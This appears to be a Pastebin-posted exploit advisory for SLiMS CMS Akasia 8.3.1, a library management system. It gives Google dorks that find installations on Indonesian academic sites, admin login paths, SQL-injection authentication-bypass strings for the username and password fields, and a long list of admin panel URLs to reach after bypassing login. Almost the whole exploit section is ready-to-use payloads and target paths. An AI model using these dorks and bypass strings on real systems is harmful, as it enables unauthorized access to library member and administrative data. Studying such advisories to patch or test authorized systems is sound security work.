Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Slims CMS Akasia 8.3.1 Improper Authorization Vulnerability
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 20/05/2019
- # Vendor Homepage : slimsetd.id - slims.web.id
- # Software Download Link : slims.web.id/goslims/?wpdmpro=slims-8-3-1-akasia
- # Software Information Link : foss4lib.org/package/senayan-library-management-system-slims/release/8.3.1
- # Software Version : 8.3.1
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks :
- intext:Template By Erwan Setyo Budi. Powered By SLiMS and ShapeBootstrap. site:ac.id
- intext:Powered By SETIADI and ShapeBootstrap. site:ac.id
- # Vulnerability Type :
- CWE-285 [ Improper Authorization ]
- CWE-284 [ Improper Access Control ]
- CWE-592 [ Authentication Bypass Issues ]
- CWE-287 [ Improper Authentication ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- Setiadi is an automation system that serves to manage repository such as thesis and
- dissertation. Setiadi is built based on SLiMS (Senayan Library Management System).
- Setiadi is an open source automation, licensed under GPL v3, built using PHP
- and MySQL database.
- SENAYAN Library Management System (SLiMS) version 8 Codename Akasia
- SLiMS is free open source software for library resources management
- (such as books, journals, digital document and other library materials) and
- administration such as collection circulation, collection management, membership,
- stock taking and many other else.
- ####################################################################
- # Impact :
- ***********
- The software does not restrict or incorrectly restricts access to a resource
- from an unauthorized actor.
- The software does not perform or incorrectly performs an authorization check when
- an actor attempts to access a resource or perform an action.
- When an actor claims to have a given identity, the software does not prove or
- insufficiently proves that the claim is correct.
- Assuming a user with a given identity, authorization is the process of determining whether
- that user can access a given resource, based on the user's privileges and any permissions
- or other access-control specifications that apply to the resource.
- When access control checks are not applied consistently - or not at all - users are able
- to access data or perform actions that they should not be allowed to perform.
- This can lead to a wide range of problems, including information exposures,
- denial of service, and arbitrary code execution.
- ####################################################################
- # Authentication Bypass / Improper Access Control / Improper Authorization Exploit :
- **************************************************************************
- Admin Panel Login Path :
- ************************
- /index.php?p=login
- /admin
- Admin Username :
- admin
- admin' --
- '=''or'
- ' or 1=1 limit 1 -- -+
- anything' OR 'x'='x
- Admin Password :
- admin
- admin' --
- '=''or'
- ' or 1=1 limit 1 -- -+
- anything' OR 'x'='x
- Useable Admin Control Panel Links Exploits :
- ******************************************
- /admin/modules/system/app_user.php?changecurrent=true&action=detail
- /admin/index.php?mod=bibliography
- /admin/modules/bibliography/index.php?action=detail
- /admin/modules/bibliography/item.php
- /admin/modules/bibliography/checkout_item.php
- /admin/modules/bibliography/z3950sru.php
- /admin/modules/bibliography/z3950.php
- /admin/modules/bibliography/p2p.php
- /admin/modules/bibliography/dl_print.php
- /admin/modules/bibliography/item_barcode_generator.php
- /admin/modules/bibliography/marcexport.php
- /admin/modules/bibliography/marcimport.php
- /admin/modules/bibliography/printed_card.php
- /admin/modules/bibliography/export.php
- /admin/modules/bibliography/import.php
- /admin/modules/bibliography/item_export.php
- /admin/modules/bibliography/item_import.php
- /admin/index.php?mod=circulation
- /admin/modules/circulation/index.php?action=start
- /admin/modules/circulation/quick_return.php
- /admin/modules/circulation/loan_rules.php
- /admin/modules/reporting/customs/loan_history.php
- /admin/modules/reporting/customs/overdued_list.php
- /admin/modules/reporting/customs/reserve_list.php
- /admin/index.php?mod=membership
- /admin/modules/membership/index.php
- /admin/modules/membership/index.php?action=detail
- /admin/modules/membership/member_type.php
- /admin/modules/membership/member_card_generator.php
- /admin/modules/membership/export.php
- /admin/modules/membership/import.php
- /admin/index.php?mod=master_file
- /admin/modules/master_file/index.php
- /admin/modules/master_file/rda_cmc.php?type=content
- /admin/modules/master_file/rda_cmc.php?type=media
- /admin/modules/master_file/rda_cmc.php?type=carrier
- /admin/modules/master_file/publisher.php
- /admin/modules/master_file/supplier.php
- /admin/modules/master_file/author.php
- /admin/modules/master_file/topic.php
- /admin/modules/master_file/location.php
- /admin/modules/master_file/news_type.php
- /admin/modules/master_file/place.php
- /admin/modules/master_file/item_status.php
- /admin/modules/master_file/coll_type.php
- /admin/modules/master_file/doc_language.php
- /admin/modules/master_file/label.php
- /admin/modules/master_file/frequency.php
- /admin/modules/master_file/p2pservers.php
- /admin/modules/master_file/item_code_pattern.php
- /admin/modules/master_file/author.php?type=orphaned
- /admin/modules/master_file/topic.php?type=orphaned
- /admin/modules/master_file/publisher.php?type=orphaned
- /admin/modules/master_file/place.php?type=orphaned
- /admin/index.php?mod=stock_take
- /admin/modules/stock_take/index.php
- /admin/modules/stock_take/init.php
- /admin/modules/system/index.php
- /admin/index.php?mod=system
- /admin/modules/system/envinfo.php
- /admin/modules/system/ucsetting.php
- /admin/modules/system/theme.php
- /admin/modules/system/content.php
- /admin/modules/system/biblio_indexes.php
- /admin/modules/system/module.php
- /admin/modules/system/app_user.php
- /admin/modules/system/user_group.php
- /admin/modules/system/shortcut.php
- /admin/modules/system/holiday.php
- /admin/modules/system/barcode_generator.php
- /admin/modules/system/sys_log.php
- /admin/modules/system/backup.php
- /admin/index.php?mod=reporting
- /admin/modules/reporting/index.php
- /admin/modules/reporting/loan_report.php
- /admin/modules/reporting/member_report.php
- /admin/modules/reporting/customs/class_recap.php
- /admin/modules/reporting/customs/titles_list.php
- /admin/modules/reporting/customs/item_titles_list.php
- /admin/modules/reporting/customs/item_usage.php
- /admin/modules/reporting/customs/loan_by_class.php
- /admin/modules/reporting/customs/member_list.php
- /admin/modules/reporting/customs/member_loan_list.php
- /admin/modules/reporting/customs/loan_history.php
- /admin/modules/reporting/customs/due_date_warning.php
- /admin/modules/reporting/customs/overdued_list.php
- /admin/modules/reporting/customs/staff_act.php
- /admin/modules/reporting/customs/visitor_report.php
- /admin/modules/reporting/customs/visitor_report_day.php
- /admin/index.php?mod=chat
- /admin/index.php?mod=serial_control
- /admin/modules/serial_control/index.php
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement